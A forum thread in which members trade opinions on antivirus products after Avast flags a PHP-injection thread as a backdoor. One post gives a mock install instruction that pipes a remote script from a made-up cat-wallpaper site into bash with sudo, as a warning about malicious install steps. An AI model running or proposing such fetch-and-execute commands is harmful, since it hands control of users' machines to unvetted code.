Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Just got a backdoor virus alert from avast while opening php-injection thread ?
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Just got a backdoor virus alert from avast while opening php-injection thread ?

Did anyone else just get a backdoor virus alert from their antivirus when opening php-injection thread? Is someone trying to inject something into lowendtalk now :S ?

Comments

• 4n0nx4n0nx Member

uninstall avast, problem solved. :D

• @4n0nx said:
    uninstall avast, problem solved. :D

Exact. http://www.kaspersky.com/

• Or install Linux instead.

Thanked by 1yomero
  • Yeah avast sucks. If there writtes virus or injection it will report that site as infected. Just do not use antivirus. It will not help nothing

• earlearl Member

Yeah.. Avast isn't the greatest and it's getting more and more intrusive with all the ads and notifications popping up all the time..

I actually got the Zeus virus even with avast installed. Had to use Malwarebytes to remove it, cause Avast didn't detect it at all.

Thanked by 2Scottsman netomx
  • Use ESET Smart Security or Bullguard for real protection, they have the lowest false positive rate ive seen so far.

• I don't use avast, why not use avg ? It's lightweight and quite a good anti virus.

• raza19raza19 Veteran

I guess I put too much trust in avast! Its a real shame if it flagged the thread as a backdoor only because people were discussing about viruses,etc !

• HyperSpeedHyperSpeed Member
    edited April 2015

It's not like people say, mentioning "viruses" etc it's the fact when you copy snippets of code etc, so forth it blocks it. I've personally found no problems with Avast and provided that it scans my mail too I can't complain
    Having a look I can see php on that page "er($qV[4].V].$q}['q']);}?>" Snippet of it so it doesn't block this, it most likely recognises that line as a malicious piece then blocked the whole page for safety.

• Me running no antivirus

Thanked by 1netomx
  • @earl said:
    Yeah.. Avast isn't the greatest and it's getting more and more intrusive with all the ads and notifications popping up all the time..

I actually got the Zeus virus even with avast installed. Had to use Malwarebytes to remove it, cause Avast didn't detect it at all.

Try the Business version, Pretty much the same as avast free but with centralised management and so far no ads.

Thanked by 1earl
  • joepie91joepie91 Member, Patron Provider

For a bit more perspective about AV software: Avast was the only AV vendor who paid out a bug bounty when security issues were reported to them.

Thanked by 1HyperSpeed
  • @joepie91 said:
    For a bit more perspective about AV software: Avast was the only AV vendor who paid out a bug bounty when security issues were reported to them.

what is your opinion about Bullguard?

http://www.bullguard.com/products/bullguard-internet-security.aspx

it's like no one uses this security software yet it charges premium prices and ive personally found it to be just as effective as ESET Smart Security. The only difference between Bullguard and ESET Smart Security that ive found yet is that Bullguard support actually answers customer tickets on a profesional manner while ESET doesnt reply at all in most cases. Technical-wise both security softwares apear to be just as effective to me.

• MSPNick said: why not use avg ? It's lightweight and quite a good anti virus.

AVG lightweight? it's probably one of the worst. even norton runs on less resources. (but norton has changed, its much better these days)

Thanked by 1TheKiller
    edited April 2015

Mark_R said: what is your opinion about Bullguard?

http://www.bullguard.com/products/bullguard-internet-security.aspx

it's like no one uses this security software yet it charges premium prices and ive personally found it to be just as effective as ESET Smart Security. The only difference between Bullguard and ESET Smart Security that ive found yet is that Bullguard support actually answers customer tickets on a profesional manner while ESET doesnt reply at all in most cases. Technical-wise both security softwares apear to be just as effective to me.

Bullguard just uses Bitdefender, apparently. The Bitdefender engine fared very poorly in the research I linked... Try CTRL+Fing through the document for it.

• @telephone said:
    Or install Linux instead.

I disagree. Linux can get viruses just as easily with and without anti-virus.

• @joepie91 said:
    Bullguard just uses Bitdefender, apparently. The Bitdefender engine fared very poorly in the research I linked... Try CTRL+Fing through the document for it.

I'll read trough this later today. But first i'd like to know what security software you recommend/use - if i may ask. Thanks.

• What's wrong with avast? I like it.

• @TarZZ92 said:

+1. I also found AVG heavy resource hungry.

• @QuadraNet_Adam said:
    What's wrong with avast? I like it.

+1

@Mark_R said:
    I'll read trough this later today. But first i'd like to know what security software you recommend/use - if i may ask. Thanks.

I personally run Linux and monitor my system manually, insofar possible. Neither malware nor AV have really gotten very far for Linux yet.

For others on Windows systems, I generally install Avast, although I'm not very happy about the increasingly pushy approach towards free users. From a security POV, though, it still seems to be the better option. Their immediate blocking of government malware upon report is also encouraging - some of the AV vendors "play favorites" in that sense, and that's a bit concerning.

• jarjar Patron Provider, Top Host, Veteran
    edited April 2015

@raza19 said:
    Did anyone else just get a backdoor virus alert from their antivirus when opening php-injection thread? Is someone trying to inject something into lowendtalk now :S ?

I posted a link that some scanners didn't like. I propose it was due to the content posted at that link, which is for helping you identify compromised PHP scripts.

• I don't use AV software on windows machines, I'm just really careful - I do this to pull the last bit of performance out of my machines that would otherwise have been spent on reading and hashing files

• telephonetelephone Member
    edited April 2015

KwiceroLTD said: I disagree. Linux can get viruses just as easily with and without anti-virus.

That's true, but as @joepie91 mentioned above neither malware nor AV have gotten as far in Linux.

Heck, anyone with a jazzed up '.io' website could spread a backdoor/virus for Linux via their install instructions alone.

We here at catcollective.io love cats so much that we had to create an Awesome program to automatically rotate cat wallpapers. Never again will you be stuck without your cat fix!

To install this program, just run: curl -sL https://wallpaper.catcollective.io | bash. Don't worry about us asking for 'sudo' access... We TOTALLY need 'sudo' to install cat wallpapers!

classy said: I don't use AV software on windows machines, I'm just really careful - I do this to pull the last bit of performance out of my machines that would otherwise have been spent on reading and hashing files

I hope you've never plugged in a friends USB drive before then. I've seen nasty rootkits spread unknowingly through friends/co-workers while passing documents on USB.

• 4n0nx4n0nx Member

telephone said: Heck, anyone with a jazzed up '.io' website could spread a backdoor/virus for Linux via their install instructions alone.

Exactly. And anyone with an .exe will find Windows users dumb enough to run it. No antivirus can protect against that, especially if the user disables it because they trust the file.

And then there are 0 day exploits on websites...

I think avast classifies my website as malicious. The funny part is that I have had the domain for years now and there isn't even a website. Only on a subdomain there is a page that has no Javascript on it.

classy said: I don't use AV software on windows machines, I'm just really careful

Then you've almost certainly already gotten owned. The majority of modern malware doesn't make itself known, and to sufficiently protect yourself from it, you'd have to know the entire stack you're running from top to bottom, and constantly monitor everything. That's a full-time job.

Thanked by 1telephone
  • 4n0nx4n0nx Member

joepie91 said: Then you've almost certainly already gotten owned. The majority of modern malware doesn't make itself known, and to sufficiently protect yourself from it, you'd have to know the entire stack you're running from top to bottom, and constantly monitor everything. That's a full-time job.

In theory, all he has to do is not run malicious files.. and maybe use noscript/non admin user

@4n0nx said:
    In theory, all he has to do is not run malicious files.. and maybe use noscript/non admin user

No, that's bullshit. The stealth malware is typically distributed through exploit kits, using vulnerabilities in the software you use (whether a browser or otherwise). Whether you catch these or not has absolutely nothing to do with "running malicious files" or not.

NoScript breaks half the internet, and doesn't even solve the problem - while a JS interpreter is a relatively large attack surface, it's not the only attack surface. Could be an iframed PDF. Could be a memory vulnerability in a CSS parser letting you execute arbitrary code through a stylesheet. And so on.

Your browsing habits don't matter. You almost certainly will catch malware at some point.

• 4n0nx4n0nx Member

joepie91 said: it's not the only attack surface. Could be an iframed PDF. Could be a memory vulnerability in a CSS parser letting you execute arbitrary code through a stylesheet. And so on.

pfft that never happens.

Anyway, my point was to focus more on the causes. One can also simply run all programs in a sandbox (Sandboxie on Windows is great). Of course one could make malware that detects the sandbox type and uses a known exploit for it, but let's be realistic..

• sinsin Member

I'm running Windows 7 and I use: ESET Smart Security (bought openbox on Amazon for $10, check Amazon out for good deals on antivirus stuff), Malwarebytes Antimalware Premium Edition (you can buy a lifetime license on newegg for cheap when they have sales), and the free version of Malwarebytes AntiExploit - all three together work really well and so far I haven't had any issues with viruses or malware.